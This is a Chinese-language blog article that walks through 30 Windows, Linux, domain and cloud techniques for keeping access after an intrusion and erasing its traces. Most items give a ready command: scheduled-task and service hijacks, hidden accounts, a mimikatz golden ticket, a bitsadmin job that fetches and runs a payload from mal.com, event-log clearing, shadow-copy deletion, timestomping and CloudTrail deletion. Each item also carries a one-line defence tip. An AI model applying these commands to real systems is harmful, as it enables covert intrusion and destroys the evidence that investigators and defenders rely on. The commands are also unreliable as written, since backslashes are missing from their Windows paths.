在攻防对抗中,内网横向移动后的权限维持与痕迹清理是决定攻击能否长期隐蔽的关键环节。本文将系统解析30种高价值技巧,覆盖Windows/Linux系统、域环境及常见服务,并提供对应的防御视角建议。
第一部分:权限维持15则
1. 计划任务伪装
• 技术点:通过 schtasks
创建名称类似系统服务(如MicrosoftEdgeUpdate
)的定时任务,触发后门执行。• 操作: schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:malware.exe" /sc hourly
• 防御:监控计划任务中非微软签名的程序路径。
• 技术点:劫持合法服务(如 Print Spooler
)的二进制路径指向恶意负载。• 操作: sc config spooler binPath= "C:WindowsSystem32mal.dll"
• 防御:启用服务签名验证( RequireSignedServiceBinaries
)。
• 技术点:修改 HKCUSoftwareMicrosoftWindowsCurrentVersionRun
或HKLM
对应项。• 隐蔽性:使用CLSID混淆键名(如 {AB3D1234-...}
)。• 防御:部署注册表变更告警规则。
• 技术点:将恶意快捷方式( .lnk
)放入%AppData%MicrosoftWindowsStart MenuProgramsStartup
。• 绕过:利用 .url
文件伪装为合法文档。• 防御:限制用户目录写入权限。
• 技术点:注册WMI事件过滤器(如用户登录触发后门)。 • 脚本: $filterArgs = @{ EventNamespace='rootcimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" } $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }
• 防御:定期审计 __EventFilter
/__EventConsumer
类。
• 技术点:通过注册表添加隐藏账户( F
值修改为0x3e9
)。• 操作: reg add "HKLMSAMSAMDomainsAccountUsers000003E9" /v F /t REG_BINARY /d ...
• 防御:检查SAM中用户RID是否连续。
• 技术点:利用域控的KRBTGT哈希伪造TGT票据。 • 生成: kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt
• 防御:定期重置KRBTGT密码(每180天)。
• 技术点:为关键进程(如 LSASS.exe
)添加调试权限。• 操作: Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow
• 防御:监控敏感进程的ACL变更。
• 技术点:替换系统目录(如 C:WindowsSystem32
)中未签名的DLL。• 优先级:利用DLL搜索顺序劫持应用程序。 • 防御:启用DLL签名强制验证( CIG
功能)。
• 技术点:修改低权限用户的RID为500(管理员RID)。 • 操作:通过 mimikatz
调整注册表F
字段。• 防御:检查用户SID与RID的合法性。
• 技术点:注册恶意COM组件劫持 MMC
或Office
调用链。• 注册表路径: HKCRCLSID{...}InprocServer32
• 防御:禁用未签名的COM组件加载。
• 技术点:注入 WS2_32.dll
的connect
函数实现网络通信重定向。• 工具:使用 Detours
库实现函数劫持。• 防御:启用驱动签名验证(DSE)。
• 技术点:利用后台智能传输服务(BITS)下载恶意负载。 • 命令: bitsadmin /create backdoor bitsadmin /addfile backdoor http://mal.com/payload.exe C:tempsvchost.exe bitsadmin /SetNotifyCmdLine backdoor C:tempsvchost.exe NULL
• 防御:审核BITS任务列表。
• 技术点:在跨域信任场景中利用SID History属性提权。 • 操作:使用 mimikatz
添加域控的SID至用户属性。• 防御:禁用不必要的域信任关系。
• 技术点:在 Normal.dotm
模板中嵌入恶意宏代码。• 触发:用户启动Word时自动执行。 • 防御:启用宏执行限制(仅允许签名宏)。
第二部分:痕迹清理15则
16. Windows事件日志清除
• 工具: wevtutil cl Security
(需管理员权限)。• 对抗:使用内存注入技术直接操作 eventlog.service
进程。• 防御:启用日志转发至SIEM系统。
• 路径: C:inetpublogsLogFilesW3SVC1
。• 技巧:仅删除特定时间段的日志条目(避免全量删除引发怀疑)。 • 防御:配置日志文件ACL为只读。
• 操作:删除新增的放行规则( netsh advfirewall firewall delete rule name="mal_rule"
)。• 隐蔽:复用已有规则名称(如 Remote Desktop
)。• 防御:基线化防火墙规则并监控变更。
• 工具: timestomp.exe -m "01/01/2020 08:00:00" malware.exe
。• 匹配:将时间戳与系统文件(如 notepad.exe
)保持一致。• 防御:启用文件完整性监控(FIM)。
• 技术点:卸载恶意驱动后调用 ExAllocatePool
覆盖内存区域。• 工具:使用 BOF
(Beacon Object Files)实现无文件擦除。• 防御:部署内存扫描工具(如 Elastic Endpoint
)。
• 命令: del /f /q /s *.*
配合shift+delete
彻底清除。• 增强:使用 cipher /w:C:
覆写磁盘空闲空间。• 防御:审计敏感目录的文件删除操作。
• 路径: C:WindowsPrefetch
中.pf
文件。• 操作:定期执行 del /f /q C:WindowsPrefetch*.pf
。• 防御:禁用预读取功能(需评估性能影响)。
• 命令: vssadmin delete shadows /all /quiet
。• 对抗:在提权后优先删除卷影防止取证恢复。 • 防御:限制 vssadmin
执行权限。
• 注册表路径: HKCUSoftwareMicrosoftTerminal Server ClientServers
。• 自动化:编写脚本批量删除历史IP记录。 • 防御:启用RDP连接日志审计。
• 工具:使用 BrowsingHistoryView
导出并删除Chrome/Firefox记录。• 进阶:劫持浏览器扩展自动清理历史(如恶意插件)。 • 防御:监控浏览器进程的异常行为。
• 技术点:通过 -WindowStyle Hidden -ExecutionPolicy Bypass
隐藏执行窗口。• 日志清除:删除 Microsoft-Windows-PowerShell%4Operational.evtx
。• 防御:启用模块日志记录( ScriptBlockLogging
)。
• 路径: Applications and Services LogsMicrosoftWindowsWMI-Activity
。• 难点:需停止 Winmgmt
服务后操作日志文件。• 防御:启用WMI活动审计策略。
• 文件: /var/run/utmp
、/var/log/wtmp
。• 命令:使用 utmpdump
工具编辑登录记录。• 防御:配置 ttylog
实时记录会话内容。
• MySQL: PURGE BINARY LOGS BEFORE '2024-01-01';
• MSSQL:执行 EXEC sp_cycle_errorlog;
循环日志文件。• 防御:启用数据库审计并异地存储日志。
• AWS:通过 DeleteLogGroup
删除CloudTrail日志组。• Azure:使用 Remove-AzLogProfile
清除活动日志配置。• 防御:启用云日志不可变性(Immutable Storage)。
防御方建议
• 权限维持检测:部署EDR监控进程树异常、注册表关键路径变更及服务签名异常。 • 痕迹清理对抗:实施日志多副本存储(本地+云端+物理设备),使用AI分析日志完整性。 • 红队验证:定期模拟攻击验证防御体系有效性,重点关注上述30项技术的防护盲区。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...